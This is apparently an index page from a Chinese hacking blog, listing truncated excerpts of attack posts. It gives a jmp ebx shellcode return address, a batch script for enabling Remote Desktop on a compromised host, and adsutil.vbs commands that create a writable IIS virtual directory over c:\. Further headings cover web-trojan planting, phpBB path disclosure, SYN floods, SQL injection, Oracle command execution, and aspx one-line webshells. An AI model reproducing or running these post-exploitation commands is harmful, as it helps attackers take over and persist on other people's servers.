0x7ffa4a1b jmp ebx \xff\xe3
..............
阅读全文
开3389的几种方法(留帖备查)
摘要: 1.打开记事本,编辑内容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
...................
阅读全文
adsutil.vbs
摘要: web 和 数据分离,有Pcanywhere,数据库服务器有 IIS,
cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一个Web服务的端口
cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir创建一个虚拟目录wodexi
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/path c:\ 设置路径
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/accesswrite 1设置写权限
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi
阅读全文
挂马代码大全(ZT)
摘要: 一:框架挂马
二:js文件挂马
首先将以下代码
document.write("
");
保存为xxx.js,
则JS挂马代码为
三:js变形加密
muma.txt可改成任意后缀
.............
阅读全文
phpBB获得物理路径
摘要: 可以得到网站物理路径
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/users/phpbb.cn/privmsg.php on line 62
Warning: Cannot modify header information - headers already sent by (output started at /www/users/phpbb.cn/privmsg.php:62) in /www/users/phpbb.cn/includes/sessions.php on line 207
Warning: Cannot modify header information - headers already sent by (output started at /www/users/phpbb.cn/privmsg.php:62) in /www/users/phpbb.cn/includes/session
阅读全文
synflood程序分析(ZT)
摘要: 原理:
三次握手
假设一个用户向服务器发送了SYN报文后突然再无回应报文,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的注意后一个确认ACK报文,这种情况下服务器端一般会重试连接并等待一段时间后丢弃这个未完成的连接,这段时间 的长度我们称为SYN Timeout。如果模拟大量的SYN请求,将会导致目标主机无法维护大量的半连接请求,消耗资源,造成synflood。
..............
阅读全文
被小菜们忽略的SQL注入技巧
摘要: from:s0n9 '5 b109
下面我要谈到一些sqlserver新的bug,虽然本人经过长时间的努力,当然也有点幸运的成分在内,才得以发现,不敢一个人独享,拿出来请大家鉴别,当然很有可能有些高手早已知道了,毕竟我接触sqlserver的时间不到1年。。。。。。。
阅读全文
Oracle Execute Command Sql Script in Win
摘要: -- ----------------------------------------------------------------------------
-- SQL server下可以通过cmd_shell调用系统命令,其实Oracle下也可以。
--这个SQL就是建立一个类似于sql Server下cmd_shell的过程。
-- ----------------------------------------------------------------------------
-- windows下的cmd_shell
-- 在win2k下的oracle817测试成功
-- benjurry@xfocus.org
-- 使用方法:
--1、以d
阅读全文
aspx的一句话木马
摘要: from:Security Box
1.相当于ASP的一句话木马:
.......
阅读全文
SQL注入Access导出WebShell
摘要: 已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。
最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。
......
阅读全文